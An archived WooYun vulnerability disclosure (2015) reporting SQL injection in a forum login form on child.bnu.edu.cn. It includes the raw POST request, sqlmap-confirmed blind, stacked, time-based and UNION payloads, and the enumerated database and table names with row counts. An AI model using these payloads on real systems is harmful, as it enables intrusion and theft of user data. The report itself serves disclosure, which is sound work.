乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://child.bnu.edu.cn/
POST /luntan/LTType.aspx HTTP/1.1Content-Length: 448Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://child.bnu.edu.cnCookie: ASP.NET_SessionId=lp4ji255fu5j2k45tb4zftrt; AJSTAT_ok_pages=2; AJSTAT_ok_times=1Host: child.bnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Button1=%b5%c7%c2%bc&ls_password=g00dPa%24%24w0rD&ls_username=-1&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK%2bfFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo%3d&__VIEWSTATEGENERATOR=635B33AD
ls_username参数存在注入
sqlmap identified the following injection point(s) with a total of 188 HTTP(s) requests:---Parameter: ls_username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment) Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-7138' OR 1647=1647-- -&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-1';WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-1' WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: Button1=%b5%c7%c2%bc&ls_password=g00dPa$$w0rD&ls_username=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(83)+CHAR(113)+CHAR(120)+CHAR(83)+CHAR(86)+CHAR(72)+CHAR(118)+CHAR(78)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(107)+CHAR(79)+CHAR(75)+CHAR(114)+CHAR(87)+CHAR(101)+CHAR(70)+CHAR(117)+CHAR(120)+CHAR(111)+CHAR(74)+CHAR(105)+CHAR(113)+CHAR(106)+CHAR(77)+CHAR(76)+CHAR(71)+CHAR(87)+CHAR(80)+CHAR(98)+CHAR(85)+CHAR(88)+CHAR(79)+CHAR(70)+CHAR(78)+CHAR(83)+CHAR(97)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL-- -&__EVENTVALIDATION=/wEWBALypLmbCALsi7bFAgKsreSLDwKM54rGBkZWYJdPMSLYK+fFSn/iT5VlY4d2&__VIEWSTATE=/wEPDwUKMTM4NDQ1ODQ4Nw9kFgICAw9kFg4CAQ8WAh4HVmlzaWJsZWdkAgMPFgIfAGhkAgcPDxYCHgRUZXh0BQQ1MzE3ZGQCCQ8PFgIfAQUFMTAzMTdkZAINDw8WAh8BBQMxMzJkZAIPDw8WAh8BBQExZGQCEQ8PFgIfAQUDMTMxZGRkznwtsahknYkGYok1CaSXRwR9oIo=&__VIEWSTATEGENERATOR=635B33AD---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005
---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] KGDB[*] master[*] model[*] msdb[*] tempdb
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: KGDB+----------------+---------+| Table | Entries |+----------------+---------+| dbo.lt_huifu | 10821 || dbo.XiaoYou | 8762 || dbo.lt_tiezi | 5527 || dbo.lt_user | 3041 || dbo.News | 1973 || dbo.lt_class | 71 || dbo.lt_bk | 67 || dbo.t_typename | 57 || dbo.xh_upfile | 29 || dbo.F_UserInfo | 12 || dbo.BigType | 8 || dbo.XiaoQu | 8 || dbo.lt_bktype | 7 || dbo.SmallType | 5 || dbo.ZhongXin | 2 |+----------------+---------+
多处存在注入,整体改改吧
危害等级:无影响厂商忽略
忽略时间:2015-11-28 15:28
漏洞Rank:4 (WooYun评价)
暂无